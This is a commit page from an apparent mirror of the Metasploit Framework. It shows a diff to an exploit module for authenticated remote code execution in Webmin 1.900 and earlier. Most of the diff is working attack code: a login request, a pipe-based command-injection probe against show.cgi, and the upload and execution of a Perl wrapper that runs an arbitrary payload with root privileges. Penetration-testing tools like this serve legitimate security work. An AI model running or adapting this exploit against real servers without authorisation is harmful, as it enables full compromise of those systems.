infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Cleanup and Add Option

master
Jacob Robles 2019-03-14 13:26:41 -05:00
parent 1d586e46c0
commit fa3e84f764
No known key found for this signature in database
GPG Key ID: 3EC9F18F2B12401C
1 changed files with 15 additions and 13 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

28
modules/exploits/unix/webapp/webmin_java_file_manager_exec.rb → modules/exploits/unix/webapp/webmin_upload_exec.rb
View File

@ -11,12 +11,11 @@ class MetasploitModule < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
'Name' => 'Webmin Java File Manager Authenticated RCE',
'Name' => 'Webmin Upload Authenticated RCE',
'Description' => %q(
This module exploits an arbitrary command execution vulnerability in Webmin
1.900 and lower versions. Any user authorized to the "Java file manager"
and "Upload and Download" fields can execute arbitrary commands with root
privileges.
1.900 and lower versions. Any user authorized to the "Upload and Download"
module can execute arbitrary commands with root privileges.
In addition, if the 'Running Processes' (proc) privilege is set the user can
accurately determine which directory to upload to. Webmin application files
@ -62,14 +61,15 @@ class MetasploitModule < Msf::Exploit::Remote
OptBool.new('GUESSUPLOAD', [true, 'If no "proc" permissions exists use default path.', false]),
OptString.new('USERNAME', [true, 'Webmin Username']),
OptString.new('PASSWORD', [true, 'Webmin Password']),
OptString.new('FILENAME', [false, 'Filename used for the uploaded data'])
OptString.new('FILENAME', [false, 'Filename used for the uploaded data']),
OptString.new('TARGETURI', [true, 'Base path for Webmin application', '/'])
]
end
def login
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri('session_login.cgi'),
'uri' => normalize_uri(target_uri, 'session_login.cgi'),
'cookie' => 'testing=1',
'vars_post' => {
'page' => '',
@ -98,7 +98,7 @@ class MetasploitModule < Msf::Exploit::Remote
command = "echo #{rand_text_alphanumeric(0..9)}"
res = send_request_cgi({
'uri' => "/file/show.cgi/bin/#{rand_text_alphanumeric(5)}|#{command}|",
'uri' => "#{target_uri}/file/show.cgi/bin/#{rand_text_alphanumeric(5)}|#{command}|",
'cookie' => "sid=#{cookie}"
})
@ -128,7 +128,7 @@ class MetasploitModule < Msf::Exploit::Remote
res = send_request_raw(
'method' => 'POST',
'uri' => normalize_uri('proc', 'index_tree.cgi'),
'uri' => normalize_uri(target_uri, 'proc', 'index_tree.cgi'),
'headers' =>
{
'Referer' => "#{phost}/sysinfo.cgi?xnavigation=1"
@ -162,20 +162,20 @@ class MetasploitModule < Msf::Exploit::Remote
print_status("Attempting to execute the payload...")
command = payload.encoded
res = send_request_cgi({
'uri' => normalize_uri('file', filename),
'uri' => normalize_uri(target_uri, 'file', filename),
'cookie' => "sid=#{cookie}"
})
end
def upload_attempt(phost, cookie, dir, filename)
boundary = rand_text_alphanumeric(29)
limit = rand_text_alpha_upper(5..10)
tmpvar = rand_text_alpha_upper(3..8)
code = <<~HERE
#!/usr/bin/perl
$var = <<'#{limit}';
$#{tmpvar} = <<'#{limit}';
#{payload.encoded}
#{limit}
`$var`;
`$#{tmpvar}`;
HERE
message = Rex::MIME::Message.new
@ -190,7 +190,7 @@ class MetasploitModule < Msf::Exploit::Remote
res2 = send_request_raw(
'method' => 'POST',
'uri' => normalize_uri('updown', 'upload.cgi'),
'uri' => normalize_uri(target_uri, 'updown', 'upload.cgi'),
'vars_get' => {'id' => "#{rand_text_numeric(8..12)}"},
'data' => message.to_s,
'ctype' => "multipart/form-data; boundary=#{message.bound}",
@ -203,8 +203,10 @@ class MetasploitModule < Msf::Exploit::Remote
if res2 && res2.code == 200 && res2.body =~ /Saving file/
print_good "File #{filename} was successfully uploaded."
register_file_for_cleanup(filename)
else
print_error 'Upload failed.'
fail_with(Failure::UnexpectedReply, 'Failed to upload file')
end
end
end